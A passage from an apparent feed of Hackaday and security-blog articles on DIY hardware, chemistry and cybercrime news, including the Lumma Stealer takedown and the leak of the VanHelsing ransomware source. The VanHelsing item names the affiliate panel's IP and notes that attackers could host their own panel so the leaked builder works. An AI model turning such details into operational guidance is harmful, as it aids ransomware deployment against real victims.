There were a few pieces of physical damage to correct, too. First, the AC power cable had been cut off, which was simple enough to replace, but [Bill] also found that a power connector inside the unit was loose. With that taken care of, he has a perfectly functional and remarkably inexpensive sound system ready for movies or music. There are some other options available for getting a set of speakers blasting tunes again as well, like building the amplifier for them from scratch from the get-go.


hackaday.com/2025/05/22/trashe…


Roller Gearbox Allows For New Angles in Robotics


Wire-frame image of the gearbox, set up as a differential

DIY mechatronics always has some unique challenges when relying on simple tools. 3D printing enables some great abilities but high precision gearboxes are still a difficult problem for many. Answering this problem, [Sergei Mishin] has developed a very interesting gearbox solution based on a research paper looking into simple rollers instead of traditional gears. The unique attributes of the design come from the ability to have a compact angled gearbox similar to a bevel gearbox.

Multiple rollers rest on a simple shaft, allowing each roller to rotate independently. This matters because a circular crown gear used for angled transmission produces different rotation speeds across the contact. In [Sergei]'s testing, he found that his example gearbox could withstand 9 Nm, with the adapter breaking before the gearbox did, showing decent strength.

Red crown gear on a white frame. A blue gear with brass rollers is engaged with the crown.

Of course, how does this differ from a normal bevel gear setup or other 3D printed gearboxes? While 3D printed gears have great flexibility in their simplicity to make, having plastic on plastic is generally very difficult to get precise and long lasting. [Sergei]’s design allows for a highly complex crown gear to take advantage of 3D printing while allowing for simple rollers for improved strength and precision.

While claims of “zero backlash” may be a bit far-fetched, this design still shows great potential in helping make some cool projects. Unique gearboxes are somewhat common here at Hackaday such as this wobbly pericyclic gearbox, but they almost always have a fun spin!

youtube.com/embed/VXcuryyRGbo?…

Thanks to [M] for the tip!


hackaday.com/2025/05/22/roller…


Lumma Stealer: the start of a takedown, or just a tactical move?


In the last few hours there has been a great deal of media noise about the "takedown" of the infrastructure of the well-known malware-as-a-service Lumma Stealer, in a joint operation led by the FBI, Europol, CISA and private partners such as Microsoft. The action hit the malware's distribution systems and rental channels, aiming to disrupt one of the most active cybercriminal threats of recent years.

However, as BleepingComputer's article and independent checks also show, it is important to distinguish between the operation's tactical success and its actual ability to neutralise Lumma Stealer's infrastructure.

According to official statements, more than 2,300 domains linked to Lumma were seized and several platforms for selling and renting the malware were shut down. Microsoft obtained a court order to disable infrastructure run through fraudulent registrars. Technical analysis, however, suggests the malware is still operational across part of its network.

Tests on active samples show that Lumma can still communicate with C2 servers that were not hit. Some underground operators confirmed temporary outages that were resolved quickly. This shows that, while it was a significant disruption, the operation did not deal a definitive blow to the malware's operational chain.
A panel still active versus one that was seized

The challenge of flexible infrastructure


Lumma, like other infostealers, is designed to be resilient. Its infrastructure components are rotated frequently, C2 servers change daily, and the control panels are distributed and replicable. This makes it hard for authorities to inflict lasting damage through domain seizures alone: the infrastructure can reorganise quickly thanks to backups and dormant domains ready to be activated.

Pressure on the affiliates too


One interesting element is the alleged seizure of Lumma's official Telegram channel, or at least its compromise by the authorities. After an initial message in Russian, a second message in English appeared, attributed directly to the Federal Bureau of Investigation and reinforced by a symbolic image of a bird behind bars.

The message, addressed to the service's subscribers, ironically thanks the Lumma team for the "hospitality" granted in the channel, while accusing the administrators of failing to protect their customers.

It also offers the option of contacting the FBI directly via Telegram, Signal or email, in an apparent invitation to cooperate or surrender voluntarily. The communication closes with a deliberately ambiguous line: "if you don't contact us, don't worry: we will."

This manoeuvre, if genuine, goes beyond a simple technical seizure: it is a form of psychological pressure aimed at eroding end users' trust in the service itself, discouraging future activity and instilling panic or distrust within the criminal ecosystem.

The strategic role of private actors


One of the most significant aspects of this operation is the direct involvement of private companies in the intelligence, seizure and technical disabling phases against Lumma Stealer's infrastructure. Microsoft played a central role in obtaining a court order to seize domains run by fraudulent registrars.

ESET took part with proactive monitoring and analysis of the malware components, providing key information on how Lumma works and supporting the attribution of infrastructure elements. CleanDNS collaborated on blocking and de-registering malicious domains, while Cloudflare contributed threat-intelligence data and tooling aimed at countering the evasion techniques Lumma uses to disguise its C2 traffic.

This public-private synergy was a key lever for carrying out a coordinated operation on a global scale, showing how the effectiveness of a cyber operation today depends increasingly on cross-cutting collaboration between institutional actors and the security industry.

Are infostealers overtaking ransomware?


This operation, though not definitive, marks an important change of course: a rapidly expanding phenomenon is starting to be targeted systematically. Stealers like Lumma are becoming the real economic engine of modern cybercrime.

The mass sale of exfiltrated logs, credentials, cookies and wallets happens automatically on underground marketplaces and Telegram, generating steady profits even without direct extortion.

The partial takedown of Lumma Stealer is a concrete result, but not yet a decisive one. The infrastructure took a hit but was not dismantled entirely. The malware continues to circulate, albeit less efficiently.

It is therefore essential to watch the authorities' next moves: only sustained operations and a strategic change of pace can have a lasting effect on a threat that has already evolved beyond the ransomware model.

Sources:


The article "Lumma Stealer: the start of a takedown, or just a tactical move?" was originally published on il blog della sicurezza informatica.


Jettison Sails for Electric Propulsion


Although there are some ferries and commercial boats that use a multi-hull design, the most recognizable catamarans by far are those used for sailing. They have a number of advantages over monohull boats, including higher stability, shallower draft, more deck space, and often less drag. Of course, these advantages aren't exclusive to sailboats, and plenty of motorized recreational craft are starting to take advantage of this style as well. It's also fairly straightforward to remove the sails and add powered locomotion, as this electric catamaran demonstrates.

Not only is this catamaran electric, but it's solar powered as well. With the mast removed, the solar panels can be fitted to a canopy which provides 600 watts of power as well as shade for both passengers. The solar panels charge two 12 V 100 Ah LiFePO4 batteries and run a pair of motors. That's another benefit of using a sailing cat as an electric boat platform: the rudders can be removed and a pair of motors installed without any additional drilling in the hulls, and the boat can be steered with differential thrust, although this boat also makes allowances for pointing the motors in different directions.

In addition to a highly polished electric drivetrain, the former sailboat adds some creature comforts as well, replacing the trampoline with a pair of seats and adding an electric hoist to raise and lower the canopy. As energy density goes up and costs come down for solar panels, more and more watercraft are taking advantage of this style of propulsion as well. In the past we’ve seen solar kayaks, solar houseboats, and custom-built catamarans (instead of conversions) as well.

youtube.com/embed/1DyONG2oHPg?…


hackaday.com/2025/05/21/jettis…


Wisconsin and Michigan without phone service: Cellcom was attacked. No calls for a week


Subscribers of the telecom operator Cellcom, which serves users in Wisconsin and Michigan's Upper Peninsula (USA), were left without service for almost a week: they could neither make calls nor send SMS messages. Only several days after the incident began did the company admit what had already been suspected: a cyberattack had caused the massive disruption.

Initially the operator described the incident as a technical fault, assuring customers that data service, iMessage, RCS messaging and emergency calls to 911 continued to work. Users, however, grew increasingly frustrated by the lack of service and by being unable to port their number to another carrier: Cellcom's internal systems simply weren't working.

Now the company's CEO, Brigid Riordan, has officially confirmed that it was a "cyber incident".

In a letter to subscribers, she stressed that the company had response protocols in place and that the team had followed those plans from the outset. The measures taken include bringing in external cybersecurity experts, notifying the FBI and Wisconsin authorities, and working around the clock to restore systems.

The attack affected only a separate segment of the infrastructure, unrelated to the storage of personal data. So far there is no evidence of any information leaking, including subscribers' names, addresses and financial data.

Some services are now gradually being restored. On 19 May users were able to exchange SMS messages and make calls within the Cellcom network. The timeline for full recovery, however, remains uncertain. On its updates page the company said it expects to restore all services by the end of the week, but could not give an exact date.

For subscribers whose service is slow to return, a simple workaround is offered: turn on airplane mode for 10 seconds, then turn it off. If the problem persists, restart the device.

Despite growing criticism of its slow response, Cellcom has started to be more open about the situation: besides the letter, the CEO also recorded a video message explaining the current state of affairs and the progress of the recovery. The company has made no statement about a possible ransomware attack.

The current situation shows how critical dependence on the stability of digital infrastructure can become, even at a regional level. At the same time, Cellcom stresses that it had prepared in advance for incidents of this kind, yet the consequences were still felt by tens of thousands of users.

The article "Wisconsin and Michigan without phone service: Cellcom was attacked. No calls for a week" was originally published on il blog della sicurezza informatica.


Gene Editing Spiders to Produce Red Fluorescent Silk



Regular vs gene-edited spider silk with a fluorescent gene added. (Credit: Santiago-Rivera et al. 2025, Angewandte Chemie)
Continuing the scientific theme of adding fluorescent proteins to everything that moves, this time spiders found themselves at the pointy end of the CRISPR-Cas9 injection needle. In a study by researchers at the University of Bayreuth, common house spiders (Parasteatoda tepidariorum) had a gene inserted for a red fluorescent protein in addition to having an existing gene for eye development disabled. This was the first time that spiders have been subjected to this kind of gene-editing study, mostly due to how fiddly they are to handle as well as their genome duplication characteristics.

In the research paper in Angewandte Chemie the methods and results are detailed, with the knock-out approach of the sine oculis (C1) gene being tried first as a proof of concept. The CRISPR solution was injected into the ovaries of female spiders, whose offspring then carried the mutation. With clear deficiencies in eye development observable in this offspring, the researchers moved on to adding the red fluorescent protein gene with another CRISPR solution, which targets the major ampullate gland where the silk is produced.

Ultimately, this research serves to demonstrate that it is possible to not only study spiders in more depth these days using tools like CRISPR-Cas9, but also that it is possible to customize and study spider silk production.


hackaday.com/2025/05/21/gene-e…


High Voltage for Extreme Ozone


Grid overlaid onto a mason jar. Across the grid are high-voltage purple coronas.

Don’t you hate it when making your DIY X-ray machine you make an uncomfortable amount of ozone gas? No? Well [Hyperspace Pirate] did, which made him come up with an interesting idea. While creating a high voltage supply for his very own X-ray machine, the high voltage corona discharge produced a very large amount of ozone. However, normally ozone is produced using lower voltage, smaller gaps, and large surface areas. Naturally, this led [Hyperspace Pirate] to investigate if a higher voltage method is effective at producing ozone.

Using a custom 150kV converter, [Hyperspace Pirate] was able to test the large gap method compared to the lower voltage method (dielectric barrier discharge). An ammonia reaction with the ozone allowed our space buccaneer to test which method was able to produce more ozone, as well as some variations of the designs.

Experimental setup with ozone production in the left jar and nitrate in the right.
Large 150 kV gaps proved slightly effective, but with no large gains, at least not compared to the dielectric barrier method. With that method, glass as the dielectric leads straight to holes and HDPE gets cooked, but in the end he was able to produce a fairly sizable amount of ammonium nitrate. The best design included two test tubes filled with baking soda and their respective electrodes. Of course, this comes with the addition of a very effective ozone generator.

While this project is very thorough, [Hyperspace Pirate] himself admits the extreme dangers of high ozone levels, getting close enough to LD50 levels for worry throughout his room. That goes for playing with high voltage in general, kids! At the end of the day, even with the potential asthma risk, this is a pretty neat project that should probably be left to [Hyperspace Pirate]. If you want to check out other projects from a distance, you should look over at this 20 kW microwave to cook even the most rushed meals!

youtube.com/embed/HZYWpZYuRKc?…

Thanks to [Mahdi Naghavi] for the Tip!


hackaday.com/2025/05/21/high-v…


FLOSS Weekly Episode 833: Up and Over


This week, Jonathan Bennett and Jeff Massie chat with Tom Herbert about eBPF, really fast networking, what the future looks like for high performance computing and the Linux Kernel, and more!


youtube.com/embed/v9P5em2r0fo?…

Did you know you can watch the live recording of the show right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.

play.libsyn.com/embed/episode/…

Direct Download in DRM-free MP3.

If you’d rather read along, here’s the transcript for this week’s episode.

Places to follow the FLOSS Weekly Podcast:


Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)

Licensed under Creative Commons: By Attribution 4.0 License


hackaday.com/2025/05/21/floss-…


Field Testing An Antenna, Using A Field


The ARRL used to have a requirement that any antenna advertised in their publications had to have real-world measurements accompanying it, to back up any claims of extravagant performance. I’m told that nowadays they will accept computer simulations instead, but it remains true that knowing what your antenna does rather than just thinking you know what it does gives you an advantage. I was reminded of this by a recent write-up in which the performance of a mylar sheet as a ground plane was tested at full power with a field strength meter, because about a decade ago I set out to characterise an antenna using real-world measurements and readily available equipment. I was in a sense field testing it, so of course the first step of the process was to find a field. A real one, with cows.

Walking Round And Round A Field In The Name Of Science

A very low-tech way to make field recordings: a paper pad with an Android tablet and SDR propped on it.
The process I was intending to follow was simple enough: set up the antenna in the middle of the field, have it transmit some RF, and measure the signal strength at points along a series of radial lines away from it. I'd end up with a spreadsheet, from which I could make a radial plot that would, I hoped, give me a diagram showing its performance. It's a rough and ready methodology, but given a field and a sunny afternoon, not one that should be too difficult.

I was more interested in the process than the antenna, so I picked up my trusty HB9CV two-element 144 MHz antenna that I've stood and pointed at the ISS many times to catch SSTV transmissions. It's made from two phased half-wave radiators, but it can be seen as something similar to a two-element Yagi array. I ran a long mains lead out to a plastic garden table with the HB9CV attached, and set up a Raspberry Pi whose clock would produce the RF.

My receiver would be an Android tablet with an RTL-SDR receiver. That’s pretty sensitive for this purpose, so my transmitter would have to be extremely low powered. Ideally I would want no significant RF to make it beyond the boundary of the field, so I gave the Pi a resistive attenuator network designed to give an output of around 0.03 mW, or 30 μW. A quick bit of code to send my callsign as CW periodically to satisfy my licence conditions, and I was off with the tablet and a pen and paper. Walking round the field in a polar grid wasn’t as easy as it might seem, but I had a very long tape measure to help me.

A Lot Of Work To Tell Me What I Already Knew

A polar diagram showing the radiation pattern of an HB9CV. And lo! for I have proven an HB9CV to be directional!
I ended up with a page of figures, and then a spreadsheet which I'm amused to still find in the depths of my project folder. It contains a table of angles of incidence to the antenna versus metres from the antenna, and the data points are the figure in (uncalibrated) mV that the SDR gave me for the carrier at that point. The resulting polar plot shows the performance of the antenna at each angle, and unsurprisingly I proved to myself that an HB9CV is indeed a directional antenna.
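As an added example, not the author's spreadsheet or any code from the article, here is the same bookkeeping in Python over a constructed set of readings: each reading is scaled to a common reference distance assuming far-field free-space falloff (field strength proportional to 1/r), readings at the same bearing are averaged, and the result is expressed in dB relative to the strongest bearing, which is all an uncalibrated mV figure can support. The readings, the 10 m reference distance, the 45° radial spacing and the 1/r assumption are all mine, chosen for the example.

```python
import math
from collections import defaultdict

# Constructed sample readings, not the author's real data:
# (bearing in degrees from the antenna's boresight, distance from the antenna
# in metres, SDR carrier reading in uncalibrated mV). Two distances per
# bearing, as you'd get walking out along each radial.
SAMPLE_READINGS = [
    (0, 10, 40.0), (0, 20, 20.5),
    (45, 10, 30.0), (45, 20, 15.2),
    (90, 10, 12.0), (90, 20, 6.1),
    (135, 10, 7.0), (135, 20, 3.4),
    (180, 10, 5.0), (180, 20, 2.6),
    (225, 10, 7.2), (225, 20, 3.5),
    (270, 10, 12.5), (270, 20, 6.0),
    (315, 10, 29.5), (315, 20, 14.8),
]


def normalise_to_reference(readings, ref_distance=10.0):
    """Scale each voltage reading to what it would have been at ref_distance,
    assuming far-field free-space falloff (field strength proportional to 1/r).
    Returns {bearing: [scaled mV, ...]} so readings along one radial can be
    compared: if they disagree badly, the geometry, not the antenna, is off."""
    per_bearing = defaultdict(list)
    for bearing, distance, mv in readings:
        per_bearing[bearing % 360].append(mv * distance / ref_distance)
    return per_bearing


def pattern_db(readings, ref_distance=10.0):
    """Relative radiation pattern as {bearing: dB below the strongest bearing},
    sorted by bearing. Relative values are all an uncalibrated receiver can
    give, which is enough for a shape plot (20*log10 because these are voltages)."""
    scaled = normalise_to_reference(readings, ref_distance)
    mean = {b: sum(v) / len(v) for b, v in scaled.items()}
    peak = max(mean.values())
    return {b: 20 * math.log10(m / peak) for b, m in sorted(mean.items())}


def front_to_back_db(pattern):
    """Level at boresight (0 degrees) minus the level directly behind (180)."""
    return pattern[0] - pattern[180]


def half_power_bearings(pattern, threshold_db=-3.0):
    """Bearings within threshold_db of the peak, i.e. inside the main lobe at
    whatever angular resolution the walk used."""
    return [b for b, level in pattern.items() if level >= threshold_db]


def polar_table(pattern, dynamic_range_db=30):
    """Text rendering of the pattern: one bar per bearing, full width at 0 dB."""
    lines = ["bearing  rel_dB  level"]
    for b, level in pattern.items():
        bar = "#" * max(0, int(round(dynamic_range_db + level)))
        lines.append(f"{b:7d} {level:7.1f}  {bar}")
    return "\n".join(lines)


if __name__ == "__main__":
    p = pattern_db(SAMPLE_READINGS)
    print(polar_table(p))
    print(f"front-to-back: {front_to_back_db(p):.1f} dB")
    print(f"within 3 dB of peak: {half_power_bearings(p)}")
```

The 1/r scaling only holds in the far field and on reasonably level ground: at 144 MHz the wavelength is about 2 m, so readings taken within a few metres of the antenna, or with the tablet held at a different height from one radial to the next, will not collapse onto one curve. When the scaled readings along a radial disagree by more than a couple of dB, that is the data telling you the measurement geometry is wrong, not the antenna.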

My experiment was in itself not of much use other than to prove to myself I could characterise an antenna with extremely basic equipment. But then again it’s possible that in times past this might have been a much more difficult task, so knowing I can do it at all is an interesting conclusion.


hackaday.com/2025/05/21/field-…


A New Mac Plus Motherboard, No Special Chips Required


The Macintosh Plus was Apple's third version of the all-in-one Mac, and for its time it was a veritable powerhouse. If you don't have one here in 2025 there are a variety of ways to emulate it, but should you wish for something closer to the silicon, there's now [max1zzz]'s all-new Mac Plus motherboard in a mini-ITX form factor to look forward to.

As with other retrocomputing communities, the classic Mac world has seen quite a few projects replacing custom parts with modern equivalents. Thus it has reverse engineered Apple PALs, a replacement for the Sony sound chip, an ATtiny based take on the Mac real-time clock, and a Pi Pico that does VGA conversion. It’s all surface mount save for the connectors and the 68000, purely because a socketed processor allows for one of the gold-and-ceramic packages to be used. The memory is soldered, but with 4 megabytes, this is well-specced for a Mac Plus.

At the moment it’s still in the prototype spin phase, but plenty of work is being done and it shows meaningful progress towards an eventual release to the world. We are impressed, and look forward to the modern takes on a Mac Plus which will inevitably come from it. While you’re waiting, amuse yourself with a lower-spec take on an early Mac.

Thanks [DosFox] for the tip.


hackaday.com/2025/05/21/a-new-…


Big Chemistry: Fuel Ethanol


If legend is to be believed, three disparate social forces in early 20th-century America – the temperance movement, the rise of car culture, and the Scots-Irish culture of the South – collided with unexpected results. The temperance movement managed to get Prohibition written into the Constitution, which rankled the rebellious spirit of the descendants of the Scots-Irish who settled the South. In response, some of them took to the backwoods with stills and sacks of corn, creating moonshine by the barrel for personal use and profit. And to avoid the consequences of this, they used their mechanical ingenuity to modify their Fords, Chevrolets, and Dodges to provide the speed needed to outrun the law.

Though that story may be somewhat apocryphal, at least one of those threads is still woven into the American story. The moonshiner’s hotrod morphed into NASCAR, one of the nation’s most-watched spectator sports, and informed much of the car culture of the 20th century in general. Unfortunately, that led in part to our current fossil fuel predicament and its attendant environmental consequences, which are now being addressed by replacing at least some of the gasoline we burn with the same “white lightning” those old moonshiners made. The cost-benefit analysis of ethanol as a fuel is open to debate, as is the wisdom of using food for motor fuel, but one thing’s for sure: turning corn into ethanol in industrially useful quantities isn’t easy, and it requires some Big Chemistry to get it done.

Heavy on the Starch


As with fossil fuels, manufacturing ethanol for motor fuel starts with a steady supply of an appropriate feedstock. But unlike the drilling rigs and pump jacks that pull the geochemically modified remains of half-billion-year-old phytoplankton from deep within the Earth, ethanol's feedstock is almost entirely harvested from the vast swathes of corn that carpet the Midwest US. (Other grains and even non-grain plants are used as feedstock in other parts of the world, but we're going to stick with corn for this discussion. Also, in other parts of the world "corn" refers to any grain crop, but in this case it refers specifically to maize.)
Don’t try to eat it — you’ll break your teeth. Yellow dent corn is harvested when full of starch and hard as a rock. Credit: Marjhan Ramboyong.
The corn used for ethanol production is not the same as the corn-on-the-cob at a summer barbecue or that comes in plastic bags of frozen Niblets. Those products use sweet corn bred specifically to pack extra simple sugars and less starch into their kernels, which is harvested while the corn plant is still alive and the kernels are still tender. Field corn, on the other hand, is bred to produce as much starch as possible, and is left in the field until the stalks are dead and the kernels have converted almost all of their sugar into starch. This leaves the kernels dry and hard as a rock, and often with a dimple in their top face that gives them their other name, dent corn.

Each kernel of corn is a fruit, at least botanically, with all the genetic information needed to create a new corn plant. That’s carried in the germ of the kernel, a relatively small part of the kernel that contains the embryo, a bit of oil, and some enzymes. The bulk of the kernel is taken up by the endosperm, the energy reserve used by the embryo to germinate, and as a food source until photosynthesis kicks in. That energy reserve is mainly composed of starch, which will power the fermentation process to come.

Starch is mainly composed of two different but related polysaccharides, amylose and amylopectin. Both are polymers of the simple six-carbon sugar glucose, but with slightly different arrangements. Amylose is composed of long, straight chains of glucose molecules bound together in what’s called an α-1,4 glycosidic bond, which just means that the hydroxyl group on the first carbon of the first glucose is bound to the hydroxyl on the fourth carbon of the second glucose through an oxygen atom:
Amylose, one of the main polysaccharides in starch. The glucose subunits are connected in long, unbranched chains up to 500 or so residues long. The oxygen atom binding neighboring glucose units together comes from a condensation reaction between the hydroxyl groups on the 1 and 4 carbons, with one oxygen and two hydrogens leaving in the form of water.
Amylose chains can be up to about 500 or so glucose subunits long. Amylopectin, on the other hand, has shorter straight chains but also branches formed between the number one and number six carbon, an α-1,6 glycosidic bond. The branches appear about every 25 residues or so, making amylopectin much more tangled and complex than amylose. Amylopectin makes up about 75% of the starch in a kernel.

Slurry Time


Ethanol production begins with harvesting corn using combine harvesters. These massive machines cut down dozens of rows of corn at a time, separating the ears from the stalks and feeding them into a threshing drum, where the kernels are freed from the cob. Winnowing fans and sieves separate the chaff and debris from the kernels, which are stored in a tank onboard the combine until they can be transferred to a grain truck for transport to a grain bin for storage and further drying.
Corn harvest in progress. You’ve got to burn a lot of diesel to make ethanol. Credit: dvande – stock.adobe.com
Once the corn is properly dried, open-top hopper trucks or train cars transport it to the distillery. The first stop is the scale house, where the cargo is weighed and a small sample of grain is taken from deep within the hopper by a remote-controlled vacuum arm. The sample is transported directly to the scale house for a quick quality assessment, mainly based on moisture content but also the physical state of the kernels. Loads that are too wet, too dirty, or have too many fractured kernels are rejected.

Loads that pass QC are dumped through gates at the bottom of the hoppers into a pit that connects to storage silos via a series of augers and conveyors. Most ethanol plants keep a substantial stock of corn, enough to run the plant for several days in case of any supply disruption. Ethanol plants operate mainly in batch mode, with each batch taking several days to complete, so a large stock ensures the efficiency of continuous operation.
The Lakota Green Plains ethanol plant in Iowa. Ethanol plants look a lot like small petroleum refineries and share some of the same equipment. Source: MsEuphonic, CC BY-SA 3.0.
To start a batch of ethanol, corn kernels need to be milled into a fine flour. Corn is fed to a hammer mill, where large steel weights swinging on a flywheel smash the tough pericarp that protects the endosperm and the germ. The starch granules are also smashed to bits, exposing as much surface area as possible. The milled corn is then mixed with clean water to form a slurry, which can be pumped around the plant easily.

The first stop for the slurry is large cooking vats, which use steam to gently heat the mixture and break the starch into smaller chains. The heat also gelatinizes the starch, in a process similar to what happens when a sauce is thickened with a corn starch slurry in the kitchen. The gelatinized starch undergoes liquefaction under heat and mildly acidic conditions, maintained by injecting sulfuric acid or ammonia as needed. These conditions begin hydrolysis of some of the α-1,4 glycosidic bonds, breaking the amylose and amylopectin chains down into shorter fragments called dextrins. An enzyme, α-amylase, is added at this point to catalyze hydrolysis of the α-1,4 bonds along the chains. The α-1,6 branch bonds are cleaved by another enzyme, glucoamylase (also called amyloglucosidase), which works from the chain ends and releases the free glucose monomers that the yeast will ferment.

The Yeast Get Busy


The result of all this chemical and enzymatic action is a glucose-rich mixture ready for fermentation. The slurry is pumped to large reactor vessels where a combination of yeasts is added. Saccharomyces cerevisiae, or brewer’s yeast, is the most common, but other organisms can be used too. The culture is supplemented with ammonium sulfate or urea to provide the nitrogen the growing yeast requires, along with antibiotics to prevent bacterial overgrowth of the culture.

Fermentation occurs at around 30 degrees C over two to three days, while the yeast gorge themselves on the glucose-rich slurry. The glucose is transported into the yeast, where each glucose molecule is enzymatically split into two three-carbon pyruvate molecules. The pyruvates are then broken down into two molecules of acetaldehyde and two of CO2. The two acetaldehyde molecules then undergo a reduction reaction that creates two ethanol molecules. The yeast benefits from all this work by converting two molecules of ADP into two molecules of ATP, which captures the chemical energy in the glucose molecule into a form that can be used to power its metabolic processes, including making more yeast to take advantage of the bounty of glucose.
Anaerobic fermentation of one mole of glucose yields two moles of ethanol and two moles of CO2.
After the population of yeast grows to the point where they use up all the glucose, the mix in the reactors, which contains about 12-15% ethanol and is referred to as beer, is pumped into a series of three distillation towers. The beer is carefully heated to the boiling point of ethanol, 78 °C. The ethanol vapors rise through the tower to a condenser, where they change back into the liquid phase and trickle down into collecting trays lining the tower. The liquid distillate is piped to the next two towers, where the same process occurs and the distillate becomes progressively purer. At the end of the final distillation, the mixture is about 95% pure ethanol, or 190 proof. That’s the limit of purity for fractional distillation, thanks to the tendency of water and ethanol to form an azeotrope, a mixture of two or more liquids that boils at a constant temperature. To drive off the rest of the water, the distillate is pumped into large tanks containing zeolite, a molecular sieve. The zeolite beads have pores large enough to admit water molecules, but too small to admit ethanol. The water partitions into the zeolite, leaving 99% to 100% pure (198 to 200 proof) ethanol behind. The ethanol is mixed with a denaturant, usually 5% gasoline, to make it undrinkable, and pumped into storage tanks to await shipping.

Nothing Goes to Waste


The muck at the bottom of the distillation towers, referred to as whole stillage, still has a lot of valuable material and does not go to waste. The liquid is first pumped into centrifuges to separate the remaining grain solids from the liquid. The solids, called wet distiller’s grain or WDG, go to a rotary dryer, where hot air drives off most of the remaining moisture. The final product is dried distiller’s grain with solubles, or DDGS, a high-protein product used to enrich animal feed. The liquid phase from the centrifuge is called thin stillage, which contains the valuable corn oil from the germ. That’s recovered and sold as an animal feed additive, too.
Ethanol fermentation produces mountains of DDGS, or dried distiller’s grain solubles. This valuable byproduct can account for 20% of an ethanol plant’s income. Source: Inside an Ethanol Plant (YouTube).
The final valuable product that’s recovered is the carbon dioxide. Fermentation produces a lot of CO2, about 17 pounds per bushel of feedstock. The gas is tapped off the tops of the fermentation vessels by CO2 scrubbers and run through a series of compressors and coolers, which turn it into liquid carbon dioxide. This is sold off by the tanker-full to chemical companies, food and beverage manufacturers, who use it to carbonate soft drinks, and municipal water treatment plants, where it’s used to balance the pH of wastewater.

There are currently 187 fuel ethanol plants in the United States, most of which are located in the Midwest’s corn belt, for obvious reasons. Together, these plants produced more than 16 billion gallons of ethanol in 2024. Since each bushel of corn yields about 3 gallons of ethanol, that translates to an astonishing 5 billion bushels of corn used for fuel production, or about a third of the total US corn production.
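As an added worked calculation (not part of the original article), here is the fermentation stoichiometry carried through to a per-bushel yield, to show that the 17 pounds of CO2 per bushel and the roughly 3 gallons of ethanol per bushel quoted above are two views of the same reaction. The molar masses and the density of ethanol (0.789 g/mL, about 6.58 lb/gal) are standard values; everything else is the article’s own numbers.

$$\mathrm{C_6H_{12}O_6} \;\rightarrow\; 2\,\mathrm{C_2H_5OH} + 2\,\mathrm{CO_2}$$

$$180.16\ \mathrm{g} \;\rightarrow\; 2(46.07) + 2(44.01) = 92.14 + 88.02 = 180.16\ \mathrm{g}$$

So every pound of CO2 released is matched by 92.14/88.02 ≈ 1.047 pounds of ethanol:

$$17\ \mathrm{lb\ CO_2/bushel} \times \frac{92.14}{88.02} \approx 17.8\ \mathrm{lb\ ethanol/bushel}$$

$$\frac{17.8\ \mathrm{lb}}{6.58\ \mathrm{lb/gal}} \approx 2.7\ \mathrm{gal/bushel}$$

which is in line with the “about 3 gallons” figure. The maximum theoretical yield of the reaction itself is 92.14/180.16 ≈ 0.511 g of ethanol per gram of glucose; real plants come in somewhat below that because the yeast divert some of the sugar into new cells and byproducts rather than ethanol.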


hackaday.com/2025/05/21/big-ch…


VanHelsing Ransomware: Leaked Source Code Reveals Unsettling Secrets


The source code of the affiliate panel of the VanHelsing RaaS (ransomware-as-a-service) malware has been made public. Not long before, a former developer had tried to sell the source code on the RAMP hacking forum.

The VanHelsing ransomware was launched in March 2025, and its creators claimed it could attack Windows, Linux, BSD, ARM and ESXi systems. According to Ransomware.live, at least eight victims have fallen prey to its attacks since then.

Earlier this week, someone using the nickname th30c0der attempted to sell the source code of the VanHelsing panel and affiliate sites, together with Windows and Linux ransomware builds, on the darknet. The price was to be set by auction, with an opening bid of 10,000 dollars.

“Selling vanhelsing ransomware source code: TOR keys included + web admin panel + chat + file server + blog, all databases included,” th30c0der wrote on the RAMP hacking forum.

According to security researcher Emanuele De Lucia, the VanHelsing operators decided to preempt the seller and published the ransomware’s source code themselves. They also claimed that th30c0der is one of their former malware developers, who is trying to scam people by selling old source code.

“Today we announce that we will publish the old source code, and that we will soon release a new and improved version of the locker (VanHelsing 2.0),” the VanHelsing operators stated on RAMP.

In response, th30c0der claimed that his material is more complete, since the VanHelsing developers published neither the Linux builder nor any databases, which could be particularly useful to law enforcement and security researchers.

Journalists at Bleeping Computer examined the published source code and confirmed that it contains a working builder for the Windows version of the malware, as well as the source code of the affiliate panel and of the data leak site.

According to the researchers, the builder’s source code is a mess, and the Visual Studio files sit in the Release folder, which is normally used to store compiled binaries and build artifacts.

Note also that using the VanHelsing builder requires some extra work, because it connects to the affiliate panel at 31.222.238[.]208 to retrieve data. Since the dump contains the panel’s source code, including the api.php endpoint, attackers can modify the code or run their own copy of the panel to make the builder work.

The published archive also contains the source code of the Windows ransomware, which can be used to build a standalone locker, decryptor and loader.

Among other things, the publication notes that the attackers apparently attempted to create an MBR locker that would replace the master boot record with a custom bootloader displaying a lock message.

The article VanHelsing Ransomware: Leaked Source Code Reveals Unsettling Secrets originally appeared on the cybersecurity blog.


A Look Inside a Lemon of a Race Car


Automotive racing is a grueling endeavor, a test of one’s mental and physical prowess to push an engineered masterpiece to its limit. This is all the more true of 24 hour endurance races, where teams of drivers take turns at the wheel to complete the most laps of a circuit over a 24 hour period. The format pushes cars and drivers to the very limit. Doing so on a $500 budget, as the 24 Hours of Lemons requires, makes this all the more impressive!

Of course, racing on a $500 budget is difficult to say the least. All the expected Fédération Internationale de l’Automobile (FIA) safety requirements are still in place, including roll cage, seats and fire extinguisher. However, brakes, wheels, tires and safety equipment are not factored into the cost of the car, which is good because an FIA racing seat can run well in excess of the budget. Despite the name, most races are twelve to sixteen hours across two days, but 24 hour endurance races are run. The very limiting budget and amateur nature of the event has created a large amount of room for teams to get creative with car restorations and race car builds.

The 24 Hours of Le-MINES Team and their 1990 Miata
One such team we had the chance to speak with goes by the name 24 Hours of Le-Mines. Their build is a wonderful mishmash of custom fabrication and affordable parts. It’s built from a restored 1990 NA Miata, complete with rusted frame and all! Power is handled by a rebuilt 302 Mustang engine of indeterminate age.

The stock Miata brakes look rather small for a race car, but are plenty for a car of its weight. The suspension is an Amazon special, because it only has to work for 24 hours. The boot lid (or trunk lid, if you prefer) is held down with what look to be oversized RC car body pins. Nestled next to the PVC intake pipe is a nitrous oxide canister; we don’t know if it’s functional or just for show, but we like it nonetheless. The scrappy look is completed with a section of road sign fabricated into a shifter cover.

The team is unsure whether the car will end up racing, but odds are that if you are reading Hackaday, you care more about the race cars than the actual racing. Regardless, we hope to see this Miata in the future!

This is certainly not the first time we have covered 24 hour endurance engineering, like this solar powered endurance plane.


hackaday.com/2025/05/21/a-look…


Dero miner zombies biting through Docker APIs to build a cryptojacking horde
